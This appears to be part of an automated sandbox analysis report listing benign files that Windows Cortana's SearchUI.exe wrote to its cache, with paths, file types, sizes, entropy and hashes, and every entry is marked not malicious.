                                                                            SHA1:F1BF7CB5ADDF0C4BCED58D661137A1F0ACD257C5
                                                                            SHA-256:6B58339F9240E372FA046E985DA0D0C5A17B679F27FF3058D6EBD4CD515CA874
                                                                            SHA-512:5ACEFCAB3062051BD538CCF57EBCBB0BC9FCF11C12768EC7559B2ADA84F871299CE2C93B2400807F362578AD2C0F31AFF5CFE925C2FB259A7FFD24CC498435ED
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\LSXA5TU8\CZIHQonDpTUFJtspRwNCgsVwcbI[1].js
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:ASCII text, with very long lines
                                                                            Category:dropped
                                                                            Size (bytes):20331
                                                                            Entropy (8bit):5.353707554144033
                                                                            Encrypted:false
                                                                            SSDEEP:384:KrKmz6fqbGpAbQJegXlAqW2oJWZ3BnqIfPZGmVY4OtKAvKXAL5NuwK3++9O:dweJlA8pBnqIHbYPt4XALulO
                                                                            MD5:8F26207241C02CE723D12F116BD4FC94
                                                                            SHA1:4B0B6224194AC8FF83AFBE01F43F961C6AB381B2
                                                                            SHA-256:70BB56FFDBA78F49FB3C5112E4A10F87305AA84AA30C16A2DB89D09C8DC1DE6B
                                                                            SHA-512:53B57930C395B741D1D6E10E27333480928AA11CB6386805922B0410A187424A109F7F1111D6C539C9FCCC1FB4F618A3F9BBB886D5B2808F856C429B6099800A
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\LSXA5TU8\ksGFoLlJPEAPv3E_nINrfjMObto[1].css
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):77070
                                                                            Entropy (8bit):5.207119466144056
                                                                            Encrypted:false
                                                                            SSDEEP:384:B7Nyr2SeGdDzVOwFsOB1ZgM53klAq00EWvsECx0enIh1r7UHcPhQ5nNCKq8YEc6k:B7Ny5fdDzVzOOWuxPqenQ8HcP8YErk
                                                                            MD5:2A65EE8C69A6CC4994BE335E5CA2DA06
                                                                            SHA1:42955DD6591F2850CE3ED113868BAD83DDB7BECE
                                                                            SHA-256:28347980CC14326DE860458333D0DB01BAFCBBD7B398004202E0545E41E9127A
                                                                            SHA-512:94A5C2D4B7318DE303E6AB56F624FB0CC3956B9833A44C9EFDB787008545F1664416EF66C42237706FB06DB885985B88361F6525A8B26EA223D39B3D0BDF9AE5
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\LSXA5TU8\nEl6gm6izUrrDobE23TevZhe_fI[1].css
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):66986
                                                                            Entropy (8bit):6.002532652367151
                                                                            Encrypted:false
                                                                            SSDEEP:1536:Rk0h26JqMsJrdUPBERLxAMP7a5zjEMQBNRDIu/QAwape4:Rlv1sLRMz43BNFB
                                                                            MD5:4D3E595F2CBC3A17F1AF84725C46E751
                                                                            SHA1:0825FFDBABA1A76BD3291A01E0BC37DC0287FCA5
                                                                            SHA-256:3CBDCF1C0B5C56F239D334AA89251B0D0398E4C36F0490435097E02CF5BC7EB9
                                                                            SHA-512:93B570A293843B3ABEAB8C8CC73B3B9F8B66B68E5A31F28854A6F0EDE70D1F7FE3E1821D484420F694AF280EEB7EE7B84C24DAAFE1F1FEEBA503D238204CBB51
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\LSXA5TU8\zh8Gb8BdCdZddFgn7wQ6G86Jdok.br[1].js
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):37342
                                                                            Entropy (8bit):5.3267899861839485
                                                                            Encrypted:false
                                                                            SSDEEP:768:7nUURAWwEyypCXv8eBVjsRj838VtmJCG+A21TgXB6jAladSEPTurOiqUVXUiPKG7:D38Ey5jsRIsbmJQA4EXB6jAladSeTuTx
                                                                            MD5:F44EA9D80C88FBCDA801F3A2E0D79E8D
                                                                            SHA1:942DAC5E088686F2D09D048AA5F376DE366421E1
                                                                            SHA-256:57DEBE6CDD1AEBDE19A85A2B95AA78FD8DCA4726F12BBB0D59931E5F21F92C85
                                                                            SHA-512:2AB3D3F4551DD32F0AA7BF50660FBC28FD690C95108AA460C4C465DEF883A7D76DE1E286D3132029BECA767AE615A0DF788F91D7367CD9D0C9DA32754CB3364D
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\L7KWFN4L\www.bing[1].xml
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):6175
                                                                            Entropy (8bit):5.36682740183826
                                                                            Encrypted:false
                                                                            SSDEEP:192:ofjfQIfQz5+fQfH1aOvAdsAvPoQsoQdZ+mV/vLQ2QH:ofjflfi+fc4KiswQ6KVnLJg
                                                                            MD5:F20F7BA9500B5D84BD3AABF6E0C6897D
                                                                            SHA1:FA9778383137E294A47A3EF86D96D2C6EE9C1495
                                                                            SHA-256:14434B1C6D7232A5C401963186D2750179260AE90003BCBC517FC8D10573D114
                                                                            SHA-512:7F3A4E7D9A1B1EC0DF8E671A6852B7A8428554BBB7421024FA31C996751BE44787879661B82B32B8DF4C3C346577CCE1F1E1D5AF2C6C654F83C0C01D487614AA
                                                                            Malicious:false
                                                                            Preview: <root><item name="eventLogQueue_Online" value="[]" ltime="3179865184" htime="30865871" /><item name="eventLogQueue_Online_logUploadIntervalStartDate" value="1601478891803" ltime="1913829744" htime="30840636" /><item name="eventLogQueue_Online_uploadedLogSizeInInterval" value="0" ltime="3618421648" htime="30747937" /></root><root><item name="eventLogQueue_Online" value="[]" ltime="3179865184" htime="30865871" /><item name="eventLogQueue_Online_logUploadIntervalStartDate" value="1612317368648" ltime="3282835184" htime="30865871" /><item name="eventLogQueue_Online_uploadedLogSizeInInterval" value="0" ltime="3618421648" htime="30747937" /></root><root><item name="eventLogQueue_Online" value="[]" ltime="3179865184" htime="30865871" /><item name="eventLogQueue_Online_logUploadIntervalStartDate" value="1612317368648" ltime="3282835184" htime="30865871" /><item name="eventLogQueue_Online_uploadedLogSizeInInterval" value="0" ltime="3618421648" htime="30747937" /><item name="CB47C15FA3044AB884F7
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Chrome
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):5.058439866878886
                                                                            Encrypted:false
                                                                            SSDEEP:96:P4kV7+thhFWrntTK66gsUJNj8+6fR0YP/NfhBR35Ko:nxNWjFf+YPVfhBRph
                                                                            MD5:54DB706E65E13CEFBF0B08230B92CF49
                                                                            SHA1:79CF70BD7C3BF5B15752E7F74198D978D387369B
                                                                            SHA-256:8D3060795A55F2A2319E613BE44706C9C4D6C22FB318E6F72E85C20F27E21A5F
                                                                            SHA-512:150FE5D87B711424808AFF8BCD9BC07351D1E05234BC54323D75FF83A7F013EB58B93004312C1FEB76C88465B3EAE9AEE7F8AD22FD84CDE4637D70EFCA055352
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{116229A7-9A3B-2078-DB5F-B5A20811242C}
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):3.906964992469157
                                                                            Encrypted:false
                                                                            SSDEEP:48:yyJv1cZdsqRnRPHDU3SedT8kIltCXjq/My:Zv1cZSyPjU9ikStCzq/
                                                                            MD5:5D7B70550F986FD58C8AF588D9390F92
                                                                            SHA1:729E76EEE747C565041F106878CC71191281B0AD
                                                                            SHA-256:48EBBD5DD1385364FB2FBD2FBE5041F9E06EC88E28155D5BB4CD55F791827D50
                                                                            SHA-512:126A87358816CE860650A63C8F63E1B97FFD35043665A0A77D1B785318ABD88EACDD6293D2E5B1AA91A3280242AC2B371BCFA1D8111CE00570C918013AE4204B
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{67471CB4-015B-F9E9-FE9B-341BFA6FA6BF}
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):5.707737634015558
                                                                            Encrypted:false
                                                                            SSDEEP:48:L6INZWMW/ikSJSm9j9ykrJmgo9s/ua42GkB7ZbKPB5CXMaLLjFz4Yq:dNZLuikSJjj8KJy9QhT8PB5CXMaTFz1
                                                                            MD5:F5FDC471FF9FD6417A4C14CB8EB25DA8
                                                                            SHA1:9002F85D19F45613D99CEBF32A72EE028FB32BE4
                                                                            SHA-256:640AE58924D8AB0966EF73564BB46EEAC57F4FEFC3F7B9F22083DE387C44131D
                                                                            SHA-512:8B6FE4071D5724AA0FD2EDCEA919DF1DEBEB82E745B902461070587BC7C492CB1197153B629DBCF19DC2BDB1A6E132B7275CD5CF0FF7912378CC5BA9CE196F0B
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{8AA47365-B2B3-1961-69EB-F866E376B12F}
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):5.433311929343217
                                                                            Encrypted:false
                                                                            SSDEEP:48:FQUF1VaH2rRJEqdB7xi9pjJXf7Hn75TtwieKHgGdnj/7kN0cL/JOSJiJx8Vc:FHMqPzxiV7NZ1PHHtcLMSJ2kc
                                                                            MD5:7F3ECF5DE354DC3562D8A8DF65716D18
                                                                            SHA1:224E8A01E2BA10C5E71FA7DBCB7EFC61BD5C91E6
                                                                            SHA-256:FDD71FB9508790789A49A73D21CB24D68905320A68A0FB359C189AF9C17EC961
                                                                            SHA-512:E2EC81505925807658FCD2662B30E0945D8435758A03F46E6E6FF8FF6D9801D319D302C77370C9E969F557C53575C757B8A90FACFA89B3F87B9DBD036B7AC427
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{8ABD94FB-E7D6-84A6-A997-C918EDDE0AE5}
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):5.805922576270289
                                                                            Encrypted:false
                                                                            SSDEEP:96:Y+xmVQWFVMdQvI+Lndz+7VL4sE4r7Dccx:VxYQWM29Ld+ue/z
                                                                            MD5:76BEF4FFA8C2C3E87A098ADC690E5409
                                                                            SHA1:C5B3940E0C0C30C6C6CD02740627EC9877B890E0
                                                                            SHA-256:BF507D1E4BA343BD33CAA0C6D043A617C49D22269C335A4D636B828F3FF0C2DB
                                                                            SHA-512:CFEC8FB6F3F828716BDBEFC7E612B7AF4EB631B6B18CDFF1086E40F3F1479D5DDCAE926D05B45093E04D49EDD85FB0ED56489ABAC4D74878A47ED3CCCBC69F94
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{923DD477-5846-686B-A659-0FCCD73851A8}
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):5.191498081073383
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{BB044BFD-25B7-2FAA-22A8-6371A93E0456}
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):4.758563700930361
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{BD3F924E-55FB-A1BA-9DE6-B50F9F2460AC}
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):4.9826129309850105
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{C1C6F8AC-40A3-0F5C-146F-65A9DC70BBB4}
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):5.462538552372063
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{C804BBA7-FA5F-CBF7-8B55-2096E5F972CB}
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):5.433311929343217
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{DAA168DE-4306-C8BC-8C11-B596240BDDED}
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):3.177035776003501
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{F4DE281A-828F-1F6E-5CBF-B09D699BAD75}
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):5.707737634015558
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_MSPaint_8wekyb3d8bbwe!Microsoft_MSPaint
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):3.0938248162210447
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_MicrosoftOfficeHub_8wekyb3d8bbwe!Microsoft_MicrosoftOfficeHub
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PNG image data, 44 x 44, 8-bit/color RGBA, non-interlaced
                                                                            Category:dropped
                                                                            Size (bytes):440
                                                                            Entropy (8bit):7.2211459644895815
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Office_OUTLOOK_EXE_16
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):3.2015377796533695
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_People_8wekyb3d8bbwe!x4c7a3b7dy2188y46d4ya362y19ac5a5805e5x
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):1.7663419026818459
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_WindowsFeedbackHub_8wekyb3d8bbwe!App
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):1.4896124497860672
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_WindowsMaps_8wekyb3d8bbwe!App
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):1.8014741696472236
                                                                            Encrypted:false
                                                                            SSDEEP:24:cqtTPYxvEItnX7FdQE83ZzanX9vvsfRaApdH+aWfRahabEMvEw2P0:Vcdr/letov0fRvD+7Kk1vj
                                                                            MD5:8B2833B8F236498E840DF60EBB8D93FC
                                                                            SHA1:D91BEED5A0D695F1F3988B3B6E2A3AF625E44EAE
                                                                            SHA-256:2F3467F8D0B43677312ED799CBBD24A55A38DEC31D36DDD484CB15F8A00EB8A1
                                                                            SHA-512:6B16B002541D6DA7AEEE5B7EA0ECF32924EC318B4CAE0B71AAFDDF9A4BAA80E9DD9A873FF1FA6B03ABEA257BDF6A21FC0AE5D6577C3648CCE1F7B738C207C3A3
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_MediaPlayer32
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):5.165365240752661
                                                                            Encrypted:false
                                                                            SSDEEP:96:EpyLLnUFH4FZGBTVASV5RUVjrOiYk1VteDNIR:ZSmZGBTVASV5+jrOiYG6
                                                                            MD5:97D7481A161966CB002947378806C997
                                                                            SHA1:4112BAC013749F5DB6F3B011CF2E2021993D559E
                                                                            SHA-256:193E06A2449A8F9BAD72098D5FAA8E80EA718C37154AD8226E4CAD4E877022E4
                                                                            SHA-512:E37BC346F1F94DFBBEBB6F09CB87AF2EE944531E23F4D34802EF39D9406C820158F7CE8BCE1E9DDA08DA710FF575CF3297AD078BB93EFB807AC98A8772898AF9
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_RemoteDesktop
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):5.634056273992868
                                                                            Encrypted:false
                                                                            SSDEEP:48:z7eIraSD22gNBqm4xbqLvahelnA/T4kggyYY1BQN/9K3tACW9mBaZhBVaX:zRhDiNImr8hRe6N9yAhHZh/aX
                                                                            MD5:21192A679058AA1E80D0A187DDE5B069
                                                                            SHA1:7115B8A2FCE428548158F97E8588D56F1C846363
                                                                            SHA-256:4A64A59CB3C99A62734F36C1DB15F76296FFDEE04071D67BA15810F7F6780869
                                                                            SHA-512:D63343BB397356EA9E1C0673FA2584EEB45D5C0FAA3DBE6E2180954A2F0FDE74892E31BFD6DA56F6F841DED21605D5BDA600127A32F5FB257AD6D88F84190617
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\https___java_com_
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):5.707737634015558
                                                                            Encrypted:false
                                                                            SSDEEP:48:L6INZWMW/ikSJSm9j9ykrJmgo9s/ua42GkB7ZbKPB5CXMaLLjFz4Yq:dNZLuikSJjj8KJy9QhT8PB5CXMaTFz1
                                                                            MD5:F5FDC471FF9FD6417A4C14CB8EB25DA8
                                                                            SHA1:9002F85D19F45613D99CEBF32A72EE028FB32BE4
                                                                            SHA-256:640AE58924D8AB0966EF73564BB46EEAC57F4FEFC3F7B9F22083DE387C44131D
                                                                            SHA-512:8B6FE4071D5724AA0FD2EDCEA919DF1DEBEB82E745B902461070587BC7C492CB1197153B629DBCF19DC2BDB1A6E132B7275CD5CF0FF7912378CC5BA9CE196F0B
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\https___java_com_help
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):5.707737634015558
                                                                            Encrypted:false
                                                                            SSDEEP:48:L6INZWMW/ikSJSm9j9ykrJmgo9s/ua42GkB7ZbKPB5CXMaLLjFz4Yq:dNZLuikSJjj8KJy9QhT8PB5CXMaTFz1
                                                                            MD5:F5FDC471FF9FD6417A4C14CB8EB25DA8
                                                                            SHA1:9002F85D19F45613D99CEBF32A72EE028FB32BE4
                                                                            SHA-256:640AE58924D8AB0966EF73564BB46EEAC57F4FEFC3F7B9F22083DE387C44131D
                                                                            SHA-512:8B6FE4071D5724AA0FD2EDCEA919DF1DEBEB82E745B902461070587BC7C492CB1197153B629DBCF19DC2BDB1A6E132B7275CD5CF0FF7912378CC5BA9CE196F0B
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\zn=BV5!!!!!!!!!MKKSkSetLanguageFiles_
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):4.091393886147505
                                                                            Encrypted:false
                                                                            SSDEEP:48:S2p1is1OFe7AzySvvwFeNgrI1hRJnvvDB5AEuSr:tp911Uz3vvwE/75ATS
                                                                            MD5:237FD7FFE25A3DD82A6AD7CCC6D12E73
                                                                            SHA1:BDA3E9C2E3FDB351E6270C823A834C6932475CC4
                                                                            SHA-256:AF90E7F5C4E07B1701584FFECC5FBD2DA33F9E53BC56B30A4C64BD6472A26A87
                                                                            SHA-512:11F71AFC174882D665CF08AC49F0479343E5B6B5C3C513850402B0A4987AFD0F5FEF8BF7F02EEF52DFC1382EAD1B684F75A02BBEBF44E539BD09A40B9CB861E6
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\zn=BV5!!!!!!!!!MKKSkWxpFiles_
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):4.753170569098153
                                                                            Encrypted:false
                                                                            SSDEEP:96:1CYL+dvy9+8jXzoEoT7OFOQUIauBk14xj3+45daCP5/gs:4EPLRj3OUJ
                                                                            MD5:0A9C3DB1BAF6D7791EE3C11803AC8F21
                                                                            SHA1:137546ADFA1CB5CB70E7DE8253B3F4F321B2494A
                                                                            SHA-256:546165CA24DAEA0384E16DC18F419D47DE750A66B6258B100112940B96B7A9E7
                                                                            SHA-512:71E54D6D4C3BD055016DAB6D1C828922E936C64201AA461A532DF59CB7F05BACE32D961941B9C5D15AB4D79EF444EA25702B2C27030C83C8FF0A5AEC75C3967B
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_MdSched_exe
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):5.216065097062321
                                                                            Encrypted:false
                                                                            SSDEEP:48:MCpCI05HSN3BkCVrFXLCWwTIZqqw2GD3Wjg9b4lvGYuRhqMjFs9oVeFow2WX+H:/LoI3BTXLt7UDWEKl+Y0B58mgk
                                                                            MD5:AE299AE65C392E07340FD6939ACE38C7
                                                                            SHA1:4418C657A947D890C17398AE87919BD7C05FBD37
                                                                            SHA-256:0A3C25129BD35899D42CCFC150451E6A5771316ED9395DAD1927AEBD34EE44F7
                                                                            SHA-512:55BDA87845C246D501EDF9D64691B18B2396751992FC0802F90258370FE15525772A1F5B248159DA079D0C1939837BE6D1E2F005600FB377499B288C0713B8AE
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_RecoveryDrive_exe
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):3.5533088519253964
                                                                            Encrypted:false
                                                                            SSDEEP:48:AXE64JGbsmj26RLPl+imd2t8ysMDGS3HM:AXE64JGbXjdRLt+Rd2tUVks
                                                                            MD5:B1DF32151B1B60387CCACB5BD01CB5EE
                                                                            SHA1:B0C61D7B8E31AB66A71BF6C6D39192E43F0D523A
                                                                            SHA-256:353FFD359ACC0A35A112112A3644DFBA91C1EA342B68B3F87E4C953D847471F6
                                                                            SHA-512:CE48D468630C61E8EAB04AD087A68D757A3FACDAAB683D903D334711EC197B6B3A2CB3394491114CBF1CE0B12FC8142B1C1D4B8436666F44D04C897DBEF93F8C
                                                                            Malicious:false
